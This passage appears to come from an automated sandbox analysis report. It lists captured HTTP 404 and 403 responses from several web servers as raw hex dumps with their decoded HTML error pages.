6f 6e 74 2d 73 69 7a 65 3a 20 32 31 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 32 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 7d 0a 0a 70 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 30 70 78 3b 0a 7d 0a 0a 61 20 7b 0
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:41 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-122-137.ec2.internalX-Request-Id: a78b2832-5f62-455e-9566-63c3c97326deData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title>** Not Found **</title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:41 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-123-181.ec2.internalX-Request-Id: c91faefd-56a1-4ffa-88fa-926ab46c9e3fData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title>** Not Found **</title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:40 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.grg17geblergasse.at/wp-json/>; rel="https://api.w.org/"Transfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 33 64 39 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 72 67 31 37 67 65 62 6c 65 72 67 61 73 73 65 2e 61 74 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0a 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 61 73 73 4e 61 6d 65 20 3d 20 27 6a 73 27 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 7c 20 47 52 47 31 37 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 09 6c 65 74 20 6a 71 75 65 72 79 50 61 72 61 6d 73 3d 5b 5d 2c 6a 51 75 65 72 79 3d 66 75 6e 63 74 69 6f 6e 28 72 29 7b 72 65 74 75 72 6e 20 6a 71 75 65 72 79 50 61 72 61 6d 73 3d 5b 2e 2e 2e 6a 71 75 65 72 79 50 61 72 61 6d 73 2c 72 5d 2c 6a 51 75 65 72 79 7d 2c 24 3d 66 75 6e 63 74 69 6f 6e 28 72 29 7b 72 65 74 75 72 6e 20 6a 71 75 65 72 79 50 61 72 61 6d 73 3d 5b 2e 2e 2e 6a 71 75 65 72 79 50 61 72 61 6d 73 2c 72 5d 2c 24 7d 3b 77 69 6e 64 6f 77 2e 6a 51 75 65 72 79 3d 6a 51 75 65 72 79 2c 77 69 6e 64 6f 77 2e 24 3d 6a 51 75 65 72 79 3b 6c 65 74 20 63 75 73 74 6f 6d 48 65 61 64 53 63 72 69 70 74 73 3d 21 31 3b 6a 51 75 65 72 79 2e 66 6e 3d 6a 51 75 65 72 79 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 7d 2c 24 2e 66 6e 3d 6a 51 75 65 72 79 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 7d 2c 6a 51 75 65 72 79 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d 66 75 6e 63 74 69 6f 6e 28 72 29 7b 69 66 28 77 69 6e 64 6f 77 2e 6a 51 75 65 72 79 29 72 65 74 75 72 6e 20 6a 51 75 65 72 79 3d 77 69 6e 64 6f 77 2e 6a 51 75 65 72 79 2c 24 3d 77 69 6e 64 6f 77 2e 6a 51 75 65 72 79 2c 63 75 73 74 6f 6d 48 65 61 64 53 63 72 69 70 74 73 3d 21 30 2c 6a 51 75 65 72 79 2e 6e 6f 43 6f 6e 66 6c 69 63 74 7d 2c 6a 51 75 65 72 79 2e 72 65 61 64 79 3d 66 75 6e 63 74 69 6f 6e 28 72 29 7b 6a 71 75 65 72 79 50 61 72 61 6d 73 3d 5b 2e 2e 2e 6a 71 75 65 72 79 50 61 72 61 6d 73 2c 72 5d 7d 2c 24 2e 72 65 61 64 79 3d 66 75 6e 63 74 69 6f 6e 28
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:40 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.grg17geblergasse.at/wp-json/>; rel="https://api.w.org/"Transfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 33 64 39 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 72 67 31 37 67 65 62 6c 65 72 67 61 73 73 65 2e 61 74 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0a 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 61 73 73 4e 61 6d 65 20 3d 20 27 6a 73 27 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 7c 20 47 52 47 31 37 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 09 6c 65 74 20 6a 71 75 65 72 79 50 61 72 61 6d 73 3d 5b 5d 2c 6a 51 75 65 72 79 3d 66 75 6e 63 74 69 6f 6e 28 72 29 7b 72 65 74 75 72 6e 20 6a 71 75 65 72 79 50 61 72 61 6d 73 3d 5b 2e 2e 2e 6a 71 75 65 72 79 50 61 72 61 6d 73 2c 72 5d 2c 6a 51 75 65 72 79 7d 2c 24 3d 66 75 6e 63 74 69 6f 6e 28 72 29 7b 72 65 74 75 72 6e 20 6a 71 75 65 72 79 50 61 72 61 6d 73 3d 5b 2e 2e 2e 6a 71 75 65 72 79 50 61 72 61 6d 73 2c 72 5d 2c 24 7d 3b 77 69 6e 64 6f 77 2e 6a 51 75 65 72 79 3d 6a 51 75 65 72 79 2c 77 69 6e 64 6f 77 2e 24 3d 6a 51 75 65 72 79 3b 6c 65 74 20 63 75 73 74 6f 6d 48 65 61 64 53 63 72 69 70 74 73 3d 21 31 3b 6a 51 75 65 72 79 2e 66 6e 3d 6a 51 75 65 72 79 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 7d 2c 24 2e 66 6e 3d 6a 51 75 65 72 79 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 7d 2c 6a 51 75 65 72 79 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d 66 75 6e 63 74 69 6f 6e 28 72 29 7b 69 66 28 77 69 6e 64 6f 77 2e 6a 51 75 65 72 79 29 72 65 74 75 72 6e 20 6a 51 75 65 72 79 3d 77 69 6e 64 6f 77 2e 6a 51 75 65 72 79 2c 24 3d 77 69 6e 64 6f 77 2e 6a 51 75 65 72 79 2c 63 75 73 74 6f 6d 48 65 61 64 53 63 72 69 70 74 73 3d 21 30 2c 6a 51 75 65 72 79 2e 6e 6f 43 6f 6e 66 6c 69 63 74 7d 2c 6a 51 75 65 72 79 2e 72 65 61 64 79 3d 66 75 6e 63 74 69 6f 6e 28 72 29 7b 6a 71 75 65 72 79 50 61 72 61 6d 73 3d 5b 2e 2e 2e 6a 71 75 65 72 79 50 61 72 61 6d 73 2c 72 5d 7d 2c 24 2e 72 65 61 64 79 3d 66 75 6e 63 74 69 6f 6e 28
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:41 GMTServer: Apache/2.4.58 (Unix)Content-Length: 196Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 26 Nov 2023 05:59:41 GMTServer: ApacheContent-Length: 208Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 61 64 6d 69 6e 2f 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /admin/on this server.</p></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:41 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-122-234.ec2.internalX-Request-Id: 4ee270f3-d117-4284-a804-0f3e608c95e5Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title>** Not Found **</title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 26 Nov 2023 05:59:42 GMTServer: ApacheContent-Length: 208Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 61 64 6d 69 6e 2f 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /admin/on this server.</p></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 26 Nov 2023 05:59:43 GMTServer: Apache/2.4.38 (Debian)Content-Length: 275Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 62 75 6e 61 73 74 61 2e 65 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at bunasta.eu Port 80</address></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:43 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.grg17geblergasse.at/wp-json/>; rel="https://api.w.org/"Transfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 33 30 32 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 72 67 31 37 67 65 62 6c 65 72 67 61 73 73 65 2e 61 74 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0a 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 61 73 73 4e 61 6d 65 20 3d 20 27 6a 73 27 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 7c 20 47 52 47 31 37 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 09 6c 65 74 20 6a 71 75 65 72 79 50 61 72 61 6d 73 3d 5b 5d 2c 6a 51 75 65 72 79 3d 66 75 6e 63 74 69 6f 6e 28 72 29 7b 72 65 74 75 72 6e 20 6a 71 75 65 72 79 50 61 72 61 6d 73 3d 5b 2e 2e 2e 6a 71 75 65 72 79 50 61 72 61 6d 73 2c 72 5d 2c 6a 51 75 65 72 79 7d 2c 24 3d 66 75 6e 63 74 69 6f 6e 28 72 29 7b 72 65 74 75 72 6e 20 6a 71 75 65 72 79 50 61 72 61 6d 73 3d 5b 2e 2e 2e 6a 71 75 65 72 79 50 61 72 61 6d 73 2c 72 5d 2c 24 7d 3b 77 69 6e 64 6f 77 2e 6a 51 75 65 72 79 3d 6a 51 75 65 72 79 2c 77 69 6e 64 6f 77 2e 24 3d 6a 51 75 65 72 79 3b 6c 65 74 20 63 75 73 74 6f 6d 48 65 61 64 53 63 72 69 70 74 73 3d 21 31 3b 6a 51 75 65 72 79 2e 66 6e 3d 6a 51 75 65 72 79 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 7d 2c 24 2e 66 6e 3d 6a 51 75 65 72 79 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 7d 2c 6a 51 75 65 72 79 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d 66 75 6e 63 74 69 6f 6e 28 72 29 7b 69 66 28 77 69 6e 64 6f 77 2e 6a 51 75 65 72 79 29 72 65 74 75 72 6e 20 6a 51 75 65 72 79 3d 77 69 6e 64 6f 77 2e 6a 51 75 65 72 79 2c 24 3d 77 69 6e 64 6f 77 2e 6a 51 75 65 72 79 2c 63 75 73 74 6f 6d 48 65 61 64 53 63 72 69 70 74 73 3d 21 30 2c 6a 51 75 65 72 79 2e 6e 6f 43 6f 6e 66 6c 69 63 74 7d 2c 6a 51 75 65 72 79 2e 72 65 61 64 79 3d 66 75 6e 63 74 69 6f 6e 28 72 29 7b 6a 71 75 65 72 79 50 61 72 61 6d 73 3d 5b 2e 2e 2e 6a 71 75 65 72 79 50 61 72 61 6d 73 2c 72 5d 7d 2c 24 2e 72 65 61 64 79 3d 66 75 6e 63 74 69 6f 6e 28
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 26 Nov 2023 05:59:46 GMTServer: Apache/2.4.38 (Debian)Content-Length: 275Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 62 75 6e 61 73 74 61 2e 65 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at bunasta.eu Port 80</address></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 26 Nov 2023 05:59:47 GMTServer: Apache/2.4.38 (Debian)Content-Length: 275Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 62 75 6e 61 73 74 61 2e 65 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at bunasta.eu Port 80</address></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:46 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.grg17geblergasse.at/wp-json/>; rel="https://api.w.org/"Transfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 33 64 39 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 72 67 31 37 67 65 62 6c 65 72 67 61 73 73 65 2e 61 74 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0a 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 61 73 73 4e 61 6d 65 20 3d 20 27 6a 73 27 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 7c 20 47 52 47 31 37 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 09 6c 65 74 20 6a 71 75 65 72 79 50 61 72 61 6d 73 3d 5b 5d 2c 6a 51 75 65 72 79 3d 66 75 6e 63 74 69 6f 6e 28 72 29 7b 72 65 74 75 72 6e 20 6a 71 75 65 72 79 50 61 72 61 6d 73 3d 5b 2e 2e 2e 6a 71 75 65 72 79 50 61 72 61 6d 73 2c 72 5d 2c 6a 51 75 65 72 79 7d 2c 24 3d 66 75 6e 63 74 69 6f 6e 28 72 29 7b 72 65 74 75 72 6e 20 6a 71 75 65 72 79 50 61 72 61 6d 73 3d 5b 2e 2e 2e 6a 71 75 65 72 79 50 61 72 61 6d 73 2c 72 5d 2c 24 7d 3b 77 69 6e 64 6f 77 2e 6a 51 75 65 72 79 3d 6a 51 75 65 72 79 2c 77 69 6e 64 6f 77 2e 24 3d 6a 51 75 65 72 79 3b 6c 65 74 20 63 75 73 74 6f 6d 48 65 61 64 53 63 72 69 70 74 73 3d 21 31 